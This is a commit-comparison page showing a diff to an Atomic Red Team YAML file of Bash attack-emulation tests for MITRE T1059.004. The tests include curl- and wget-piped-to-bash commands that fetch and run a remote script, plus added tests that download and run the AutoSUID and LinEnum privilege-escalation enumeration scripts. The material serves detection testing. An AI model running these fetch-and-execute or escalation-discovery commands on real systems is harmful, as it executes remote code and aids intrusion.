Compare commits
9 Commits
| Author | SHA1 | Date | |
|---|---|---|---|
 patel-bhavin
|
2dd769d9be | ||
|
patel-bhavin
|
27f3e17155 | ||
|
patel-bhavin
|
72b3e05233 | ||
|
Bhavin Patel
|
a47bc9f742 | ||
|
patel-bhavin
|
d18666e8f8 | ||
|
patel-bhavin
|
aa504f2b42 | ||
|
patel-bhavin
|
a6f43cc194 | ||
|
patel-bhavin
|
dfa63a2977 | ||
|
patel-bhavin
|
4332495289 |
@@ -1,40 +1,95 @@
|
||||
attack_technique: T1059.004
|
||||
display_name: 'Command and Scripting Interpreter: Bash'
|
||||
atomic_tests:
|
||||
- name: Create and Execute Bash Shell Script
|
||||
auto_generated_guid: 7e7ac3ed-f795-4fa5-b711-09d6fbe9b873
|
||||
description: |
|
||||
Creates and executes a simple bash script.
|
||||
supported_platforms:
|
||||
- macos
|
||||
- linux
|
||||
input_arguments:
|
||||
script_path:
|
||||
description: Script path
|
||||
type: Path
|
||||
default: /tmp/art.sh
|
||||
executor:
|
||||
command: |
|
||||
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
|
||||
sh -c "echo 'ping -c 4 8.8.8.8' >> #{script_path}"
|
||||
chmod +x #{script_path}
|
||||
sh #{script_path}
|
||||
cleanup_command: |
|
||||
rm #{script_path}
|
||||
name: sh
|
||||
- name: Command-Line Interface
|
||||
auto_generated_guid: d0c88567-803d-4dca-99b4-7ce65e7b257c
|
||||
description: |
|
||||
Using Curl to download and pipe a payload to Bash. NOTE: Curl-ing to Bash is generally a bad idea if you don't control the server.
|
||||
attack_technique: T1059.004
|
||||
display_name: 'Command and Scripting Interpreter: Bash'
|
||||
atomic_tests:
|
||||
- name: Create and Execute Bash Shell Script
|
||||
auto_generated_guid: 7e7ac3ed-f795-4fa5-b711-09d6fbe9b873
|
||||
description: |
|
||||
Creates and executes a simple bash script.
|
||||
supported_platforms:
|
||||
- macos
|
||||
- linux
|
||||
input_arguments:
|
||||
script_path:
|
||||
description: Script path
|
||||
type: Path
|
||||
default: /tmp/art.sh
|
||||
executor:
|
||||
command: |
|
||||
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
|
||||
sh -c "echo 'ping -c 4 8.8.8.8' >> #{script_path}"
|
||||
chmod +x #{script_path}
|
||||
sh #{script_path}
|
||||
cleanup_command: |
|
||||
rm #{script_path}
|
||||
name: sh
|
||||
- name: Command-Line Interface
|
||||
auto_generated_guid: d0c88567-803d-4dca-99b4-7ce65e7b257c
|
||||
description: |
|
||||
Using Curl to download and pipe a payload to Bash. NOTE: Curl-ing to Bash is generally a bad idea if you don't control the server.
|
||||
|
||||
Upon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in `/tmp/art-fish.txt`.
|
||||
supported_platforms:
|
||||
- macos
|
||||
- linux
|
||||
executor:
|
||||
command: |
|
||||
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
|
||||
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
|
||||
cleanup_command: |
|
||||
rm /tmp/art-fish.txt
|
||||
name: sh
|
||||
Upon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in `/tmp/art-fish.txt`.
|
||||
supported_platforms:
|
||||
- macos
|
||||
- linux
|
||||
executor:
|
||||
command: |
|
||||
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
|
||||
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
|
||||
cleanup_command: |
|
||||
rm /tmp/art-fish.txt
|
||||
name: sh
|
||||
- name: Harvest SUID executable files
|
||||
description: |
|
||||
AutoSUID application is the Open-Source project, the main idea of which is to automate harvesting the SUID executable files and to find a way for further escalating the privileges.
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
autosuid:
|
||||
description: Path to the autosuid shell script
|
||||
type: Path
|
||||
default: PathToAtomicsFolder/T1059.004/src/AutoSUID.sh
|
||||
autosuid_url:
|
||||
description: Path to download autosuid shell script
|
||||
type: Url
|
||||
default: https://raw.githubusercontent.com/IvanGlinkin/AutoSUID/main/AutoSUID.sh
|
||||
dependency_executor_name: bash
|
||||
dependencies:
|
||||
- description: |
|
||||
AutoSUID must exist on disk at specified location (#{autosuid})
|
||||
prereq_command: |
|
||||
if [ -f #{autosuid} ]; then exit 0; else exit 1; fi;
|
||||
get_prereq_command: |
|
||||
curl #{autosuid_url} --output #{autosuid}
|
||||
executor:
|
||||
command: |
|
||||
chmod +x #{autosuid}
|
||||
bash #{autosuid}
|
||||
name: sh
|
||||
|
||||
- name: LinEnum tool execution
|
||||
description: |
|
||||
LinEnum is a bash script that performs discovery commands for accounts,processes, kernel version, applications, services, and uses the information from these commands to present operator with ways of escalating privileges or further exploitation of targeted host.
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
linenum:
|
||||
description: Path to the LinEnum shell script
|
||||
type: Path
|
||||
default: PathToAtomicsFolder/T1059.004/src/LinEnum.sh
|
||||
linenum_url:
|
||||
description: Path to download LinEnum shell script
|
||||
type: Url
|
||||
default: https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
|
||||
dependency_executor_name: bash
|
||||
dependencies:
|
||||
- description: |
|
||||
LinnEnum must exist on disk at specified location (#{linenum})
|
||||
prereq_command: |
|
||||
if [ -f #{linenum} ]; then exit 0; else exit 1; fi;
|
||||
get_prereq_command: |
|
||||
curl #{linenum_url} --output #{linenum}
|
||||
executor:
|
||||
command: |
|
||||
chmod +x #{linenum}
|
||||
bash #{linenum}
|
||||
name: sh
|
||||
Reference in New Issue
Block a user